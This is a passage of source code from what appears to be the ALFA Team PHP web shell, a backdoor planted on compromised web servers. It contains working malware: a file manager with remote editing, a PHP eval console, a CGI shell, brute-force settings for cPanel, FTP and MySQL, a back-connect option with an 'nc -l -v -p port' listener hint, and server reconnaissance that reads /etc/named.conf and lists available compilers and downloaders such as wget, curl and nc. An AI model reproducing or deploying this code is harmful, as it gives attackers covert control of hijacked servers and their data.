color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML='<label class="inputfile" for="'+e+'"><span id="__fnameup'+upcount+'"></span> <strong> Choose a file</strong></label><input id="'+e+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');" multiple>',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){var a=e.target.getAttribute("path"),t=d.querySelector("#rightclick_menu > a[name=newtab]");t.setAttribute("href","javascript:void(0);"),t.removeAttribute("target"),t.onclick=function(){alfaFilesManNewTab(a,"/")};var i=e.clientX,l=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(i,l),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\./g,"\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,_=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var u=getCookie("alfa_history_files");try{for(var p in editor_files=JSON.parse(u))insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){_=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick='editorTabController(this);' opt_id='"+b+"' id='tab_"+b+"' class='editor-tab-name editor-tab-active'>"+decodeURIComponent(e)+" <img opt_id='"+b+"' onclick='closeEditorContent(this,event);return false;' title='[close]' src='http://solevisible.com/icons/menu/delete.svg'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class='editor-contents editor-content-active' id='"+b+"'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&_?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),alfa_ace_editors.editor["view_ml_content-"+t].commands.addCommand({name:"save",bindKey:{win:"Ctrl-S",mac:"Cmd-S"},exec:function(e){d.querySelector("#ace-save-btn-"+t).click()}}),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t),-1!=e.classList.value.indexOf("ace-save-btn")&&e.setAttribute("id","ace-save-btn-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id='"+e+"' class='history' onClick='reopen(this);'><div class='editor-icon'>"+loadType(a,i,e)+"</div><div class='editor-file-name'>"+a+"</div></div><div class='history-close' onClick='removeHistory(\""+e+"\");'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class='editor-icon'>"+loadType(editor_files[t].file,e,t)+"</div><div class='editor-file-name'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return'<img src="http://solevisible.com/icons/{type}" width="30" height="30">'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,d="id_delete_"+e,s=$(t).getAttribute("ftype");"folder"==s&&(s="dir"),"file"==s?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor('"+a+"','auto','','','','file')"),$(r).setAttribute("onclick","editor('"+a+"','edit','','','','"+s+"')"),$(n).setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g('FilesMan', '"+c_+"/"+a+"')")),$(i).setAttribute("onclick","editor('"+a+"','chmod','','','','"+s+"')"),$(l).setAttribute("onclick","editor('"+a+"','rename','','','','"+s+"')"),$(o).setAttribute("onclick","editor('"+a+"','touch','','','','"+s+"')"),$(d).setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\/\//g,"/"),l=l.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",JSON.stringify(editor_files),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php echo __ALFA_SECRET_KEY__; ?>")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(e){var a=alfa_current_fm_id,t=e.checked;d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked=t})}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};
1087</script>
1088<?php echo"<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
1089<input type='hidden' name='a' value='dlfile'>
1090<input type='hidden' name='c' value=''>
1091<input type='hidden' name='file' value=''>
1092</form>
1093<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
1094<div id='a_loader'><img src='".__showicon('loader')."'></div>";
1095$cmd_uname = alfaEx("uname -a",false,false);
1096$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
1097if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
1098echo '
1099</head>
1100<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
1101<div id="up_bar_holder"></div>
1102<div class="whole">
1103<form method="post" name="mf" style="display:none;">
1104<input type="hidden" name="a">
1105<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
1106for($s=1;$s<=10;$s++){
1107echo '<input type="hidden" name="alfa'.$s.'">';
1108}
1109echo '<input type="hidden" name="charset">
1110</form>
1111<div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible"><span style="color:#42ff59;">'.__ALFA_CODE_NAME__.'</span><br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
1112<div class="header"><table width="100%" border="0">
1113<tr>
1114<td width="3%"><span class="header_vars">Uname:</span></td>
1115<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
1116</tr>
1117<tr>
1118<td><span class="header_vars">User:</span></td>
1119<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
1120<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></td>
1121</tr>
1122<tr>
1123<td><span class="header_vars">PHP:</span></td>
1124<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
1125</tr>
1126<tr>
1127<td><span class="header_vars">ServerIP:</span></td>
1128<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).'</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b><div style="display:inline;display:none;" class="flag-holder"></div></td>
1129</tr>
1130<tr>
1131<td width="3%"><span class="header_vars">DateTime:</span></td>
1132<td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
1133</tr>
1134<tr>
1135<td><span class="header_vars">Domains:</span></td>
1136<td width="76%"><span class="header_values" id="header_domains">';
1137if($GLOBALS['sys']=='unix'){
1138$d0mains = _alfa_file("/etc/named.conf",false);
1139if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
1140$count=0;
1141foreach($d0mains as $d0main){
1142if(@strstr($d0main,"zone")){
1143preg_match_all('#zone "(.*)"#', $d0main, $domains);
1144flush();
1145if(strlen(trim($domains[1][0])) > 2){
1146flush();
1147$count++;}}}
1148echo "$count Domains";}}
1149else{echo("Cant Read [ /etc/named.conf ]");}
1150echo '</span></td>
1151</tr>
1152<tr>
1153<td height="16"><span class="header_vars">HDD:</span></td>
1154<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
1155</tr>';
1156if($GLOBALS['sys']=='unix'){
1157$useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
1158if(!@ini_get('safe_mode')){
1159if(strlen(alfaEx("id",false,false))>0){
1160echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
1161$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
1162$x=0;
1163foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
1164if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
1165echo '</td>
1166</tr>
1167<tr>
1168<td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
1169$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1170$x=0;
1171foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
1172if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
1173echo '</td>
1174</tr>';
1175}else{
1176echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
1177}
1178}else{
1179echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
1180}
1181}else{
1182echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
1183echo alfaEx('ver',false,false);
1184echo '</td>
1185</tr> <tr>
1186<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
1187</tr></b>';
1188}
1189$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
1190echo '<tr>
1191<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
1192</tr>
1193<tr>
1194<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><div id="alfa_solevisible"><center><a href="https://t.me/solevisible" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></div></td>
1195</tr>
1196<tr>
1197<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
1198</tr>
1199<tr>
1200<td height="11"><span class="header_vars">SoftWare: </span></td>
1201<td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
1202</tr>';
1203if($GLOBALS['sys']=="win"){
1204echo '<tr>
1205<td height="12"><span class="header_vars">DRIVE:</span></td>
1206<td colspan="2"><b>'.$drives.'</b></td>
1207</tr>';
1208}
1209echo '<tr>
1210<td height="12"><span class="header_vars">PWD:</span></td>
1211<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="#action=fileman&path='.$GLOBALS['home_cwd'].'" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a></td>
1212</tr>
1213</table>
1214</div>
1215<div id="meunlist">
1216<ul>
1217';
1218$li = array('proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Database Dumper','coldumper'=>'Column Dumper','hash'=>'En-Decoder','connect'=>'BC',
